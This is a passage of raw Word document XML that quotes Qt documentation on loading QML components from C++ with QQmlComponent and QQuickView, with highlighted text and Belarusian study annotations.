        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2900" w:history="1">
        <w:r w:rsidRPr="00A06108">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="001945D5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A06108">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>also does this, but as</w:t>
      </w:r>
      <w:r w:rsidR="001945D5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2901" w:history="1">
        <w:r w:rsidRPr="00A06108">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="001945D5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A06108">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is a</w:t>
      </w:r>
      <w:r w:rsidR="001945D5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2902" w:history="1">
        <w:r w:rsidRPr="00A06108">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QWindow</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00A06108">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-derived class, the loaded object will also be rendered into a visual display</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="001945D5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2903" w:history="1">
        <w:r w:rsidRPr="00A06108">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="001945D5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A06108">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is generally used to integrate a displayable QML object into an application's user interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B73119" w:rsidRPr="00B73119" w:rsidRDefault="00B73119" w:rsidP="00CA76F2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00B73119">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">можна злучаць </w:t>
      </w:r>
      <w:r w:rsidRPr="00B73119">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00B73119">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> прылажэнні з традыцыйнымі віджэтнымі прылажэннямі?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</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CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For example, suppose there is a</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MyItem.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file that looks like this:</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import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QtQuick</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2.0</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Item</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width</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100</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height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100</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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA76F2" w:rsidRPr="00EB7BA7" w:rsidRDefault="00CA76F2" w:rsidP="00CA76F2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This QML document can be loaded with</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2904" w:history="1">
        <w:r w:rsidRPr="00CA76F2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQmlComponent</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2905" w:history="1">
        <w:r w:rsidRPr="00CA76F2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>with the following C++ code. Using a</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2906" w:history="1">
        <w:r w:rsidRPr="00CA76F2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQmlComponent</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>requires calling</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2907" w:anchor="create" w:history="1">
        <w:r w:rsidRPr="00CA76F2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQmlComponent::create</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() to create a new instance of the component, while a</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2908" w:history="1">
        <w:r w:rsidRPr="00CA76F2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>automatically creates an instance of the component, which is accessible via</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2909" w:anchor="rootObject" w:history="1">
        <w:r w:rsidRPr="00CA76F2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickView::rootObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>():</w:t>
      </w:r>
      <w:r w:rsidR="00EB7BA7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> // </w:t>
      </w:r>
      <w:r w:rsidR="00EB7BA7" w:rsidRPr="00EB7BA7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidR="00EB7BA7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10364"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523"/>
        <w:gridCol w:w="5841"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CA76F2" w:rsidRPr="002230B8" w:rsidTr="00EB7BA7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4695"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com"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="55FFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>// Using QQmlComponent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QQmlEngine</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> engine</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QQmlComponent</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> component</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(&amp;</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>engine</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lastRenderedPageBreak/>
              <w:t>QUrl</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fromLocalFile</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="str"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="AAAAAA"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"MyItem.qml"</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QObject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object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component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create</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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="kwd"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFF55"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>delete</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="kwd"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFF55"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>object</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5669"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com"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="55FFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>// Using QQuickView</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QQuickView</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> view</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view</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setSource</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="typ"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>QUrl</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fromLocalFile</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="str"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="AAAAAA"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"MyItem.qml"</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view</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show</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lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="typ"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>QObject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object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view</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rootObject</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>();</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00CA76F2" w:rsidRPr="00CA76F2" w:rsidRDefault="00CA76F2" w:rsidP="00CA76F2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This</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object</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is the instance of the</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MyItem.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">component that has been created. </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB7BA7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>You can now modify the item's properties using</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB7BA7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2910" w:anchor="setProperty" w:history="1">
        <w:r w:rsidRPr="00EB7BA7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject::setProperty</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EB7BA7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() or</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB7BA7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2911" w:history="1">
        <w:r w:rsidRPr="00EB7BA7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQmlProperty</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EB7BA7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>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object</w:t>
